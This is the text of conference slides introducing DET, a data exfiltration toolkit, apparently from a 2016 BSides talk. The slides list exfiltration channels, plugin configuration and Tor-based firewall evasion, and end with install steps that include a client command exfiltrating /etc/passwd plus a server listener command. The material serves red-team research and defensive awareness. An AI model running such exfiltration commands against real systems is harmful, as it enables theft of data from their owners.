Introducing DET(Data Exfiltration Toolkit)

Paul Amar - BSides Ljubjana - 09/03/2016

100

General Approach

TCP

DNS

HTTP

ICMP

SMTP

General Approach

TCP

DNS

HTTP

ICMP

SMTP

General Approach

TCP

DNS

HTTP

ICMP

SMTP

General Approach

TCP

DNS

HTTP

ICMP

SMTP

General Approach

TCP

DNS

HTTP

ICMP

SMTP

General Approach

TCP

DNS

HTTP

ICMP

SMTP

HammerToss (July 2015)

What’s available today?

What’s available today?

And many more.. created almost everyday.

Not kidding.

Current state TCP

DNS

HTTP

ICMP

Twitter DMs

SMTP (eg. Gmail)

Introducing DET

Configuration file (JSON format)

File to exfiltrate

Folder to exfiltrate / multi-threaded

Plugin(s) to use

Plugin(s) to exclude

Server mode

Configuration file

List all your plugins and their configuration

Configuration file

Each plugin has its own configuration

(username, pwd, …)

Configuration file

Additional configuration (XOR Key, Sleeping time, …)

Let’s dig a bit (Client-side)

“Registration” phase 1/2

“Registration” phase 2/2

Sending the data 1/2

Sending the data 2/2

“End” phase 1/2

“End” phase 2/2

So in few words..

But wait! There’s moar.

Additional plugins (Tor Integration) 1/2

Source: http://foxglovesecurity.com/2015/11/02/hack-like-the-bad-guys-using-tor-for-

firewall-evasion-and-anonymous-remote-access/

Additional plugins (Tor Integration) 2/2

“Experimental” plugins

What’s next

- Port DET *entirely* to PowerShell (With Plugin based) (“Empire”-like)

- More plugins!

- Data obfuscation layer using Markov Chains

- https://github.com/bwall/markovobfuscate

InstallationGet/install it:

- git clone https://github.com/sensepost/DET

- pip install -r requirements --user (instal dependencies for the local user)

Client side:

- python det.py -f /etc/passwd -c ./config.json (or PS scripts)

Server side:

- python det.py -L -c ./config.json

sys.exit(0)

Paul Amar (paul@sensepost.com) / @PaulWebSec